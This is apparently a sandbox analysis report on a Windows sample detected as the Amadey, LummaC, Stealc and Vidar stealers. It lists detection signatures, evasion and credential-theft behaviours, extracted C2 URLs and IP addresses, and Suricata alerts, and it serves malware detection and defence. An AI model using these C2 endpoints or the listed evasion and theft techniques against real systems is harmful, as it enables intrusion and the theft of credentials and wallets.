Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1571893
MD5: 3f78e574ceb89348cf3af90c3a63bf20
SHA1: 6fc220d8237c163947adfea2f7e643b8535a2450
SHA256: 200f25b055e75ab01b7b34120001b35682ecda95f704e5f0645280b3fc421b38
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Excessive usage of taskkill to terminate processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: https://atten-supporse.biz/apitg Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/D Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/apitat Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpr4 Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Found malware configuration
Source: 00000009.00000002.2253656280.0000000000571000.00000040.00000001.01000000.0000000B.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000010.00000002.2678008367.000000000185E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: 5a20612cd1.exe.3320.15.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["print-vexer.biz", "covery-mover.biz", "impend-differ.biz", "zinc-sneark.biz", "atten-supporse.biz", "formy-spill.biz", "dwell-exclaim.biz", "se-blurry.biz", "dare-curbys.biz"], "Build id": "LOGS11--LiveTraffic"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe ReversingLabs: Detection: 42%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C566C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C566C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49883 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49912 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49933 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49953 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49965 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49984 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50003 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50022 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50030 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50057 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50070 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50112 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50120 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50128 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50132 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50133 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.4:50172 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50173 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50174 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50175 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50191 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50190 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50192 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50194 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50196 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50193 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50241 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50242 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50240 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2225886155.000000006C5CD000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2226169893.000000006C78F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2226169893.000000006C78F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 5a20612cd1.exe, 00000011.00000003.3221168796.00000000081F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2225886155.000000006C5CD000.00000002.00000001.01000000.0000000A.sdmp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: firefox.exe Memory has grown: Private usage: 37MB later: 187MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49792
Source: Network traffic Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.4:49807 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.4:65395 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49830 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49832 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49839 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49786 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49856 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49857 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49875 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49876 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49883 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49898 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49912 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49905 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49935 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49911 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49965 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49984 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49953 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49997 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50003 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50022 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50033 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50043 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50057 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50070 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50084 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50094 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50265 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49830 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49830 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49875 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49875 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49883 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49883 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49953 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50003 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50003 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50070 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49984 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49984 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50084 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49997 -> 104.21.64.1:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: print-vexer.biz
Source: Malware configuration extractor URLs: covery-mover.biz
Source: Malware configuration extractor URLs: impend-differ.biz
Source: Malware configuration extractor URLs: zinc-sneark.biz
Source: Malware configuration extractor URLs: atten-supporse.biz
Source: Malware configuration extractor URLs: formy-spill.biz
Source: Malware configuration extractor URLs: dwell-exclaim.biz
Source: Malware configuration extractor URLs: se-blurry.biz
Source: Malware configuration extractor URLs: dare-curbys.biz
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
